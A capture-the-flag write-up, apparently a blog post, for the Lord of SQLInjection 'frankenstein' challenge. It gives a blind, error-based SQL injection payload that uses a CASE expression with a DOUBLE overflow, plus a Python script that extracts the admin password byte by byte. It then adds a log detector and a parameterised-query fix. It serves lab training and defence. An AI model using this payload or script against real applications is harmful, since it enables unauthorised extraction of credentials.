
# [Lord Of SQLInjection] frankenstein

![Challenge source for frankenstein](https://blog.kakaocdn.net/dna/bPl2F5/btsNB5F9D1P/AAAAAAAAAAAAAAAAAAAAAB8zguDgrpm5A_oP4hdelwg-ep0I9Bcb268nylpAeUEw/img.png?credential=yqXZFxpELC7KVnFOS48ylbz2pIh7yKj8&expires=1782831599&allow_ip=&allow_referer=&signature=bZTOhIdt3GYlhNO08ySGBZtLlqU%3D)

#### **Code analysis**

* `union` and parentheses cannot be used
* The query is executed, and if it raises an error the page prints `error`
* The challenge is solved by finding admin's `pw` value

#### **Exploit**

* Because parentheses are filtered, the usual functions cannot be called, and `union` cannot be used either.
* The filter is bypassed with a `case` expression, which needs no parentheses.

```
[도메인 값]?pw=' or case when id='admin' and pw < 특정값 then 9e307*2 else 1 end%23
```

* When the `when` condition is true, the branch evaluates `9e307*2`; that overflows the `DOUBLE` range, so MySQL raises an error and the page prints `error`. When it is false, the branch returns `1` and the query succeeds. The error message therefore acts as a true/false oracle for the comparison.
* For an exact comparison, the value being compared against (`특정값` in the template above) must be supplied as a hex literal.
* For example, if `pw` is `0x313233` and the value is `0x31`, `pw` is larger and no error occurs; if the value is `0x32`, the comparison is true and an error is raised. Repeating this per byte recovers the password one character at a time.

```
import requests
import string

# Challenge URL from the original writeup; PHPSESSID is a placeholder for your own session cookie.
URL = "https://los.rubiya.kr/chall/frankenstein_b5bab23e64777e1756174ad33f14b5db.php"
sess = requests.session()
headers = {'Cookie': 'PHPSESSID=YOURSESSID'}

# The oracle answers "pw < prefix + candidate", so candidates must be tried in
# ascending byte order: the first one that errors is one above the real byte.
# string.printable is not sorted by code point, so sort it and drop control characters.
candidates = sorted(c for c in string.printable if 0x20 <= ord(c) < 0x7f)

admin_password = ''   # hex digits recovered so far (without the 0x prefix)

## get password, one byte at a time (bounded to 64 bytes as a safety limit)
for _ in range(64):
    found = None
    previous = None
    for j in candidates:
        guess = admin_password + f"{ord(j):02x}"   # always two hex digits per byte
        url = f"{URL}?pw=' or case when id='admin' and pw < 0x{guess} then 9e307*2 else 1 end%23"
        res = sess.get(url, headers=headers)
        if '<br>error' in res.text:
            # pw < prefix+j is true, so the real byte is the previous candidate.
            # An error on the very first candidate means the prefix is already the full password.
            found = previous
            break
        previous = j
    if found is None:
        break
    admin_password += f"{ord(found):02x}"
    print(admin_password)

print("Admin Password is", bytes.fromhex(admin_password).decode('ASCII'))
```

![Script output](https://blog.kakaocdn.net/dna/zbK8x/btsNBCdbAG8/AAAAAAAAAAAAAAAAAAAAAFGVg9qNXuHpqYuNbY_ZQaZv4IpDlj8apMAalJHrXzf5/img.png?credential=yqXZFxpELC7KVnFOS48ylbz2pIh7yKj8&expires=1782831599&allow_ip=&allow_referer=&signature=YKZR02B09km4nzx9kYPYwtcVCwk%3D)
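From the defender's side, the technique above has two observable properties: the payload carries a `case when ... then <overflow> else ... end` shape with a hex comparison, and recovering one byte costs dozens of near-identical requests from the same session. The following example, added here and not part of the original writeup, runs a small detector over constructed access-log lines (the session ids, IPs, log format, table name and demo password are all made up for the example) and then shows the root-cause fix: the same lookup done with a parameterised query, where the payload is only ever compared as a literal `pw` value.

```python
import re
import sqlite3
from collections import Counter
from urllib.parse import parse_qs, urlsplit

# Constructed sample access-log lines (format: "<ip> <phpsessid> <method> <path+query>").
# The first three are the writeup's probe for the first byte, URL-encoded as a server would log it.
SAMPLE_LOG = """
10.0.0.5 sess_a GET /chall/frankenstein.php?pw=%27%20or%20case%20when%20id%3D%27admin%27%20and%20pw%20%3C%200x31%20then%209e307*2%20else%201%20end%23
10.0.0.5 sess_a GET /chall/frankenstein.php?pw=%27%20or%20case%20when%20id%3D%27admin%27%20and%20pw%20%3C%200x32%20then%209e307*2%20else%201%20end%23
10.0.0.5 sess_a GET /chall/frankenstein.php?pw=%27%20or%20case%20when%20id%3D%27admin%27%20and%20pw%20%3C%200x33%20then%209e307*2%20else%201%20end%23
10.0.0.9 sess_b GET /chall/frankenstein.php?pw=hunter2
10.0.0.9 sess_b GET /index.php
""".strip().splitlines()

# Indicators of the CASE-based error oracle described in the writeup.
PROBE_RE = re.compile(r"\bcase\s+when\b.*\bthen\b.*\belse\b.*\bend\b", re.IGNORECASE | re.DOTALL)
OVERFLOW_RE = re.compile(r"\b\d(?:\.\d+)?e30[7-9]\b", re.IGNORECASE)   # e.g. 9e307 (DOUBLE overflow)
HEX_CMP_RE = re.compile(r"[<>]=?\s*0x[0-9a-f]+", re.IGNORECASE)          # e.g. "< 0x31"


def classify_request(path_and_query):
    """Return the set of indicator names found in any query parameter of one request."""
    query = urlsplit(path_and_query).query
    hits = set()
    for values in parse_qs(query, keep_blank_values=True).values():
        for value in values:          # parse_qs has already URL-decoded the value
            if PROBE_RE.search(value):
                hits.add("case_when_oracle")
            if OVERFLOW_RE.search(value):
                hits.add("double_overflow")
            if HEX_CMP_RE.search(value):
                hits.add("hex_comparison")
    return hits


def flag_sessions(log_lines, threshold=3):
    """Count oracle probes per session and return those at or above the threshold.

    A byte-at-a-time extraction sends one probe per candidate character, so even a
    short password produces far more probes than any legitimate client would."""
    probes = Counter()
    for line in log_lines:
        _ip, session, _method, target = line.split(maxsplit=3)
        if "case_when_oracle" in classify_request(target):
            probes[session] += 1
    return {session: n for session, n in probes.items() if n >= threshold}


def build_demo_db():
    """In-memory SQLite table standing in for the challenge's user table (constructed data)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users(id TEXT, pw TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?)",
                   [("guest", "guest"), ("admin", "constructed-demo-pw")])
    return db


def safe_login(db, user_id, pw):
    """Parameterised lookup: the payload is bound as data, so no CASE expression is ever parsed."""
    row = db.execute("SELECT id FROM users WHERE id = ? AND pw = ?", (user_id, pw)).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    print("flagged sessions:", flag_sessions(SAMPLE_LOG))
    db = build_demo_db()
    payload = "' or case when id='admin' and pw < 0x31 then 9e307*2 else 1 end#"
    print("payload as admin pw ->", safe_login(db, "admin", payload))
    print("real guest login    ->", safe_login(db, "guest", "guest"))
```

The detector keys on the structure of the probe rather than on keywords alone, since `case` on its own appears in plenty of legitimate traffic; the per-session count is what separates a single odd request from an extraction run. The SQLite half is a stand-in for the PHP/MySQL page: with bound parameters the comparison happens on the literal string, so neither the `'` nor the `case` expression reaches the parser.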
